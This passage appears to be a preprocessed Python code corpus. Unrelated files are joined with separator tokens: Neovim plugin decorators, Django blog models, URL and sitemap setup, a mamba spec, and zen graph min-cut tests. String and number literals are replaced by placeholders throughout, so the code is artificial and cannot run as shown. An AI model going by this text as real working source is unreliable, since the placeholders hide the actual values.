<EOL> f . _nvim_bind = True <EOL> f . _nvim_prefix_plugin_path = True <EOL> opts = { } <EOL> if range is not None : <EOL> opts [ '<STR_LIT>' ] = '<STR_LIT>' if range is True else str ( range ) <EOL> elif count : <EOL> opts [ '<STR_LIT:count>' ] = count <EOL> if bang : <EOL> opts [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if register : <EOL> opts [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if nargs : <EOL> opts [ '<STR_LIT>' ] = nargs <EOL> if complete : <EOL> opts [ '<STR_LIT>' ] = complete <EOL> if eval : <EOL> opts [ '<STR_LIT>' ] = eval <EOL> f . _nvim_rpc_spec = { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : sync , <EOL> '<STR_LIT>' : opts <EOL> } <EOL> return f <EOL> return dec <EOL> def autocmd ( name , pattern = '<STR_LIT:*>' , sync = False , eval = None ) : <EOL> """<STR_LIT>""" <EOL> def dec ( f ) : <EOL> f . _nvim_rpc_method_name = '<STR_LIT>' . format ( name , pattern ) <EOL> f . _nvim_rpc_sync = sync <EOL> f . _nvim_bind = True <EOL> f . _nvim_prefix_plugin_path = True <EOL> opts = { <EOL> '<STR_LIT>' : pattern <EOL> } <EOL> if eval : <EOL> opts [ '<STR_LIT>' ] = eval <EOL> f . _nvim_rpc_spec = { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : sync , <EOL> '<STR_LIT>' : opts <EOL> } <EOL> return f <EOL> return dec <EOL> def function ( name , range = False , sync = False , eval = None ) : <EOL> """<STR_LIT>""" <EOL> def dec ( f ) : <EOL> f . _nvim_rpc_method_name = '<STR_LIT>' . format ( name ) <EOL> f . _nvim_rpc_sync = sync <EOL> f . _nvim_bind = True <EOL> f . _nvim_prefix_plugin_path = True <EOL> opts = { } <EOL> if range : <EOL> opts [ '<STR_LIT>' ] = '<STR_LIT>' if range is True else str ( range ) <EOL> if eval : <EOL> opts [ '<STR_LIT>' ] = eval <EOL> f . _nvim_rpc_spec = { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : sync , <EOL> '<STR_LIT>' : opts <EOL> } <EOL> return f <EOL> return dec <EOL> def shutdown_hook ( f ) : <EOL> """<STR_LIT>""" <EOL> f . _nvim_shutdown_hook = True <EOL> f . _nvim_bind = True <EOL> return f <EOL> def decode ( mode = '<STR_LIT:strict>' ) : <EOL> """<STR_LIT>""" <EOL> def dec ( f ) : <EOL> f . _nvim_decode = mode <EOL> return f <EOL> return dec <EOL> def encoding ( encoding = True ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( encoding , str ) : <EOL> encoding = True <EOL> def dec ( f ) : <EOL> f . _nvim_decode = encoding <EOL> return f <EOL> return dec </s>
<s> from __future__ import absolute_import , print_function , unicode_literals <EOL> from django . contrib . auth . models import User <EOL> from django . core . urlresolvers import reverse <EOL> from django . db import models <EOL> from django . db . models . signals import post_save <EOL> from django . utils import timezone <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from parler . models import TranslatedFields , TranslatableModel <EOL> from knocker . mixins import KnockerModel <EOL> from knocker . signals import notify_items <EOL> from meta . models import ModelMeta <EOL> class Post ( KnockerModel , ModelMeta , models . Model ) : <EOL> """<STR_LIT>""" <EOL> title = models . CharField ( _ ( '<STR_LIT>' ) , max_length = <NUM_LIT:255> ) <EOL> slug = models . SlugField ( _ ( '<STR_LIT>' ) ) <EOL> abstract = models . TextField ( _ ( '<STR_LIT>' ) ) <EOL> meta_description = models . TextField ( <EOL> verbose_name = _ ( u'<STR_LIT>' ) , <EOL> blank = True , default = '<STR_LIT>' ) <EOL> meta_keywords = models . TextField ( verbose_name = _ ( u'<STR_LIT>' ) , <EOL> blank = True , default = '<STR_LIT>' ) <EOL> author = models . ForeignKey ( User , verbose_name = _ ( '<STR_LIT>' ) , null = True , <EOL> blank = True ) <EOL> date_created = models . DateTimeField ( auto_now_add = True ) <EOL> date_modified = models . DateTimeField ( auto_now = True ) <EOL> date_published = models . DateTimeField ( _ ( '<STR_LIT>' ) , <EOL> default = timezone . now ) <EOL> date_published_end = models . DateTimeField ( _ ( '<STR_LIT>' ) , null = True , <EOL> blank = True ) <EOL> main_image = models . ImageField ( verbose_name = _ ( '<STR_LIT>' ) , blank = True , <EOL> upload_to = '<STR_LIT>' , null = True ) <EOL> text = models . TextField ( verbose_name = _ ( u'<STR_LIT>' ) , <EOL> blank = True , default = '<STR_LIT>' ) <EOL> image_url = models . CharField ( max_length = <NUM_LIT:200> , null = True , blank = True ) <EOL> class Meta : <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> ordering = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> get_latest_by = '<STR_LIT>' <EOL> def get_title ( self ) : <EOL> return self . title <EOL> def __unicode__ ( self ) : <EOL> return self . title <EOL> def get_absolute_url ( self ) : <EOL> return reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . slug } ) <EOL> class MultiLanguagePost ( KnockerModel , ModelMeta , TranslatableModel ) : <EOL> """<STR_LIT>""" <EOL> translations = TranslatedFields ( <EOL> title = models . CharField ( _ ( '<STR_LIT:title>' ) , max_length = <NUM_LIT:255> ) , <EOL> slug = models . SlugField ( _ ( '<STR_LIT>' ) , blank = True , db_index = True ) , <EOL> ) <EOL> class Meta : <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> def get_title ( self ) : <EOL> return self . title <EOL> def __unicode__ ( self ) : <EOL> return self . title <EOL> def get_absolute_url ( self , language ) : <EOL> return reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . slug } ) <EOL> def should_knock ( self , created = False ) : <EOL> return self . get_current_language ( ) != '<STR_LIT>' <EOL> class NoKnockPost ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> title = models . CharField ( _ ( '<STR_LIT:title>' ) , max_length = <NUM_LIT:255> ) <EOL> slug = models . SlugField ( _ ( '<STR_LIT>' ) , blank = True , db_index = True ) <EOL> class Meta : <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> post_save . connect ( notify_items , sender = NoKnockPost ) </s>
<s> from __future__ import absolute_import , print_function , unicode_literals <EOL> from aldryn_apphooks_config . app_base import CMSConfigApp <EOL> from cms . apphook_pool import apphook_pool <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from djangocms_apphook_setup . base import AutoCMSAppMixin <EOL> from . cms_appconfig import BlogConfig <EOL> from . menu import BlogCategoryMenu <EOL> from . settings import get_setting <EOL> class BlogApp ( AutoCMSAppMixin , CMSConfigApp ) : <EOL> name = _ ( '<STR_LIT>' ) <EOL> urls = [ '<STR_LIT>' ] <EOL> app_name = '<STR_LIT>' <EOL> app_config = BlogConfig <EOL> menus = [ BlogCategoryMenu ] <EOL> auto_setup = { <EOL> '<STR_LIT>' : get_setting ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : get_setting ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : get_setting ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : get_setting ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : get_setting ( '<STR_LIT>' ) , <EOL> '<STR_LIT:object_name>' : get_setting ( '<STR_LIT>' ) <EOL> } , <EOL> } <EOL> apphook_pool . register ( BlogApp ) <EOL> BlogApp . setup ( ) </s>
<s> from __future__ import absolute_import , print_function , unicode_literals <EOL> from cms . utils import get_language_list <EOL> from django . contrib . sitemaps import Sitemap <EOL> from parler . utils . context import smart_override <EOL> from . . models import Post <EOL> from . . settings import get_setting <EOL> class BlogSitemap ( Sitemap ) : <EOL> def priority ( self , obj ) : <EOL> if obj and obj . app_config : <EOL> return obj . app_config . sitemap_priority <EOL> return get_setting ( '<STR_LIT>' ) <EOL> def changefreq ( self , obj ) : <EOL> if obj and obj . app_config : <EOL> return obj . app_config . sitemap_changefreq <EOL> return get_setting ( '<STR_LIT>' ) <EOL> def location ( self , obj ) : <EOL> with smart_override ( obj . get_current_language ( ) ) : <EOL> return obj . get_absolute_url ( obj . get_current_language ( ) ) <EOL> def items ( self ) : <EOL> items = [ ] <EOL> for lang in get_language_list ( ) : <EOL> items . extend ( Post . objects . translated ( lang ) . language ( lang ) . published ( ) ) <EOL> return items <EOL> def lastmod ( self , obj ) : <EOL> return obj . date_modified </s>
<s> from __future__ import absolute_import , print_function , unicode_literals <EOL> import sys <EOL> from cms . sitemaps import CMSSitemap <EOL> from cms . utils . conf import get_cms_setting <EOL> from django . conf import settings <EOL> from django . conf . urls import include , patterns , url <EOL> from django . conf . urls . i18n import i18n_patterns <EOL> from django . contrib import admin <EOL> from django . contrib . staticfiles . urls import staticfiles_urlpatterns <EOL> from djangocms_blog . sitemaps import BlogSitemap <EOL> admin . autodiscover ( ) <EOL> urlpatterns = patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : settings . MEDIA_ROOT , '<STR_LIT>' : True } ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : get_cms_setting ( '<STR_LIT>' ) , '<STR_LIT>' : True } ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : CMSSitemap , '<STR_LIT>' : BlogSitemap , <EOL> } <EOL> } ) , <EOL> ) <EOL> urlpatterns += staticfiles_urlpatterns ( ) <EOL> if '<STR_LIT>' not in sys . argv : <EOL> urlpatterns += i18n_patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , include ( <EOL> '<STR_LIT>' , namespace = '<STR_LIT>' , app_name = '<STR_LIT>' <EOL> ) ) , <EOL> ) <EOL> urlpatterns += i18n_patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , include ( admin . site . urls ) ) , <EOL> url ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> ) </s>
<s> import collections <EOL> Error = collections . namedtuple ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) </s>
<s> from expects import * <EOL> from doublex_expects import have_been_called_with <EOL> from doublex import Spy <EOL> from spec . object_mother import * <EOL> from mamba import reporter <EOL> from mamba . example import PendingExample <EOL> with description ( PendingExample ) : <EOL> with before . each : <EOL> self . example = a_pending_example ( ) <EOL> self . reporter = Spy ( reporter . Reporter ) <EOL> with context ( '<STR_LIT>' ) : <EOL> with before . each : <EOL> self . example . run ( self . reporter ) <EOL> with it ( '<STR_LIT>' ) : <EOL> expect ( self . example . was_run ) . to ( be_false ) <EOL> with it ( '<STR_LIT>' ) : <EOL> expect ( self . reporter . example_pending ) . to ( have_been_called_with ( self . example ) ) </s>
<s> def type_check ( obj , target_type , exception_msg = None ) : <EOL> """<STR_LIT>""" <EOL> if type ( obj ) != target_type : <EOL> if exception_msg == None : <EOL> exception_msg = '<STR_LIT>' % ( str ( obj ) , str ( type ( obj ) ) , str ( target_type ) ) <EOL> raise TypeError , exception_msg <EOL> return <EOL> class ZenException ( Exception ) : <EOL> pass <EOL> class InvalidGraphTypeException ( ZenException ) : <EOL> pass <EOL> class GraphChangedException ( ZenException ) : <EOL> pass </s>
<s> import unittest <EOL> import zen <EOL> class FlowTestCase ( unittest . TestCase ) : <EOL> def test_min_cut ( self ) : <EOL> G = zen . DiGraph ( ) <EOL> G . add_node ( '<STR_LIT:a>' ) <EOL> G . add_node ( '<STR_LIT:b>' ) <EOL> G . add_node ( '<STR_LIT:c>' ) <EOL> G . add_node ( '<STR_LIT:d>' ) <EOL> G . add_node ( '<STR_LIT:e>' ) <EOL> G . add_node ( '<STR_LIT:f>' ) <EOL> G . add_node ( '<STR_LIT:g>' ) <EOL> G . add_node ( '<STR_LIT:h>' ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:b>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:c>' , weight = <NUM_LIT:5> ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:d>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:e>' , weight = <NUM_LIT:9> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:f>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:c>' , weight = <NUM_LIT:4> ) <EOL> G . add_edge ( '<STR_LIT:c>' , '<STR_LIT:f>' , weight = <NUM_LIT:8> ) <EOL> G . add_edge ( '<STR_LIT:c>' , '<STR_LIT:d>' , weight = <NUM_LIT:4> ) <EOL> G . add_edge ( '<STR_LIT:d>' , '<STR_LIT:g>' , weight = <NUM_LIT:30> ) <EOL> G . add_edge ( '<STR_LIT:g>' , '<STR_LIT:c>' , weight = <NUM_LIT:6> ) <EOL> G . add_edge ( '<STR_LIT:e>' , '<STR_LIT:f>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:e>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:f>' , '<STR_LIT:g>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:f>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:g>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> self . assertEquals ( <NUM_LIT> , zen . min_cut ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) ) <EOL> self . assertEquals ( <NUM_LIT:3> , zen . min_cut ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:d>' , '<STR_LIT:g>' , float ( '<STR_LIT>' ) ) <EOL> self . assertEquals ( <NUM_LIT> , zen . min_cut_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) ) <EOL> self . assertEquals ( <NUM_LIT:3> , zen . min_cut_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:a>' , '<STR_LIT:c>' , float ( '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:c>' , '<STR_LIT:f>' , float ( '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:f>' , '<STR_LIT:h>' , float ( '<STR_LIT>' ) ) <EOL> self . assertEquals ( float ( '<STR_LIT>' ) , zen . min_cut ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) ) <EOL> self . assertEquals ( <NUM_LIT:3> , zen . min_cut ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) ) <EOL> def test_min_cut_ ( self ) : <EOL> G = zen . DiGraph ( ) <EOL> G . add_node ( '<STR_LIT:a>' ) <EOL> G . add_node ( '<STR_LIT:b>' ) <EOL> G . add_node ( '<STR_LIT:c>' ) <EOL> G . add_node ( '<STR_LIT:d>' ) <EOL> G . add_node ( '<STR_LIT:e>' ) <EOL> G . add_node ( '<STR_LIT:f>' ) <EOL> G . add_node ( '<STR_LIT:g>' ) <EOL> G . add_node ( '<STR_LIT:h>' ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:b>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:c>' , weight = <NUM_LIT:5> ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:d>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:e>' , weight = <NUM_LIT:9> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:f>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:c>' , weight = <NUM_LIT:4> ) <EOL> G . add_edge ( '<STR_LIT:c>' , '<STR_LIT:f>' , weight = <NUM_LIT:8> ) <EOL> G . add_edge ( '<STR_LIT:c>' , '<STR_LIT:d>' , weight = <NUM_LIT:4> ) <EOL> G . add_edge ( '<STR_LIT:d>' , '<STR_LIT:g>' , weight = <NUM_LIT:30> ) <EOL> G . add_edge ( '<STR_LIT:g>' , '<STR_LIT:c>' , weight = <NUM_LIT:6> ) <EOL> G . add_edge ( '<STR_LIT:e>' , '<STR_LIT:f>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:e>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:f>' , '<STR_LIT:g>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:f>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:g>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> self . assertEquals ( <NUM_LIT> , zen . min_cut_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) ) <EOL> self . assertEquals ( <NUM_LIT:3> , zen . min_cut_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:d>' , '<STR_LIT:g>' , float ( '<STR_LIT>' ) ) <EOL> self . assertEquals ( <NUM_LIT> , zen . min_cut_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) ) <EOL> self . assertEquals ( <NUM_LIT:3> , zen . min_cut_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:a>' , '<STR_LIT:c>' , float ( '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:c>' , '<STR_LIT:f>' , float ( '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:f>' , '<STR_LIT:h>' , float ( '<STR_LIT>' ) ) <EOL> self . assertEquals ( float ( '<STR_LIT>' ) , zen . min_cut ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) ) <EOL> self . assertEquals ( <NUM_LIT:3> , zen . min_cut ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) ) <EOL> def test_min_cut_set ( self ) : <EOL> G = zen . DiGraph ( ) <EOL> G . add_node ( '<STR_LIT:a>' ) <EOL> G . add_node ( '<STR_LIT:b>' ) <EOL> G . add_node ( '<STR_LIT:c>' ) <EOL> G . add_node ( '<STR_LIT:d>' ) <EOL> G . add_node ( '<STR_LIT:e>' ) <EOL> G . add_node ( '<STR_LIT:f>' ) <EOL> G . add_node ( '<STR_LIT:g>' ) <EOL> G . add_node ( '<STR_LIT:h>' ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:b>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:c>' , weight = <NUM_LIT:5> ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:d>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:e>' , weight = <NUM_LIT:9> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:f>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:c>' , weight = <NUM_LIT:4> ) <EOL> G . add_edge ( '<STR_LIT:c>' , '<STR_LIT:f>' , weight = <NUM_LIT:8> ) <EOL> G . add_edge ( '<STR_LIT:c>' , '<STR_LIT:d>' , weight = <NUM_LIT:4> ) <EOL> G . add_edge ( '<STR_LIT:d>' , '<STR_LIT:g>' , weight = <NUM_LIT:30> ) <EOL> G . add_edge ( '<STR_LIT:g>' , '<STR_LIT:c>' , weight = <NUM_LIT:6> ) <EOL> G . add_edge ( '<STR_LIT:e>' , '<STR_LIT:f>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:e>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:f>' , '<STR_LIT:g>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:f>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:g>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> cut_set = zen . min_cut_set ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:b>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:c>' , '<STR_LIT:f>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:g>' , '<STR_LIT:h>' ) in cut_set ) <EOL> cut_set = zen . min_cut_set ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:b>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:c>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:d>' ) in cut_set ) <EOL> G . set_weight ( '<STR_LIT:d>' , '<STR_LIT:g>' , float ( '<STR_LIT>' ) ) <EOL> cut_set = zen . min_cut_set ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:b>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:c>' , '<STR_LIT:f>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:g>' , '<STR_LIT:h>' ) in cut_set ) <EOL> cut_set = zen . min_cut_set ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:b>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:c>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:d>' ) in cut_set ) <EOL> G . set_weight ( '<STR_LIT:a>' , '<STR_LIT:c>' , float ( '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:c>' , '<STR_LIT:f>' , float ( '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:f>' , '<STR_LIT:h>' , float ( '<STR_LIT>' ) ) <EOL> cut_set = zen . min_cut_set ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:b>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:c>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:d>' ) in cut_set ) <EOL> cut_set = zen . min_cut_set ( G , '<STR_LIT:a>' , '<STR_LIT:h>' , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:b>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:c>' ) in cut_set ) <EOL> self . assertTrue ( ( '<STR_LIT:a>' , '<STR_LIT:d>' ) in cut_set ) <EOL> def test_min_cut_set_ ( self ) : <EOL> G = zen . DiGraph ( ) <EOL> G . add_node ( '<STR_LIT:a>' ) <EOL> G . add_node ( '<STR_LIT:b>' ) <EOL> G . add_node ( '<STR_LIT:c>' ) <EOL> G . add_node ( '<STR_LIT:d>' ) <EOL> G . add_node ( '<STR_LIT:e>' ) <EOL> G . add_node ( '<STR_LIT:f>' ) <EOL> G . add_node ( '<STR_LIT:g>' ) <EOL> G . add_node ( '<STR_LIT:h>' ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:b>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:c>' , weight = <NUM_LIT:5> ) <EOL> G . add_edge ( '<STR_LIT:a>' , '<STR_LIT:d>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:e>' , weight = <NUM_LIT:9> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:f>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:b>' , '<STR_LIT:c>' , weight = <NUM_LIT:4> ) <EOL> G . add_edge ( '<STR_LIT:c>' , '<STR_LIT:f>' , weight = <NUM_LIT:8> ) <EOL> G . add_edge ( '<STR_LIT:c>' , '<STR_LIT:d>' , weight = <NUM_LIT:4> ) <EOL> G . add_edge ( '<STR_LIT:d>' , '<STR_LIT:g>' , weight = <NUM_LIT:30> ) <EOL> G . add_edge ( '<STR_LIT:g>' , '<STR_LIT:c>' , weight = <NUM_LIT:6> ) <EOL> G . add_edge ( '<STR_LIT:e>' , '<STR_LIT:f>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:e>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:f>' , '<STR_LIT:g>' , weight = <NUM_LIT:15> ) <EOL> G . add_edge ( '<STR_LIT:f>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> G . add_edge ( '<STR_LIT:g>' , '<STR_LIT:h>' , weight = <NUM_LIT:10> ) <EOL> cut_set = zen . min_cut_set_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( <NUM_LIT:0> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT:6> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT> in cut_set ) <EOL> cut_set = zen . min_cut_set_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( <NUM_LIT:0> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT:1> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT:2> in cut_set ) <EOL> G . set_weight ( '<STR_LIT:d>' , '<STR_LIT:g>' , float ( '<STR_LIT>' ) ) <EOL> cut_set = zen . min_cut_set_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( <NUM_LIT:0> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT:6> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT> in cut_set ) <EOL> cut_set = zen . min_cut_set_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( <NUM_LIT:0> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT:1> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT:2> in cut_set ) <EOL> G . set_weight ( '<STR_LIT:a>' , '<STR_LIT:c>' , float ( '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:c>' , '<STR_LIT:f>' , float ( '<STR_LIT>' ) ) <EOL> G . set_weight ( '<STR_LIT:f>' , '<STR_LIT:h>' , float ( '<STR_LIT>' ) ) <EOL> cut_set = zen . min_cut_set_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( <NUM_LIT:0> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT:1> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT:2> in cut_set ) <EOL> cut_set = zen . min_cut_set_ ( G , <NUM_LIT:0> , <NUM_LIT:7> , '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:3> , len ( cut_set ) ) <EOL> self . assertTrue ( <NUM_LIT:0> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT:1> in cut_set ) <EOL> self . assertTrue ( <NUM_LIT:2> in cut_set ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
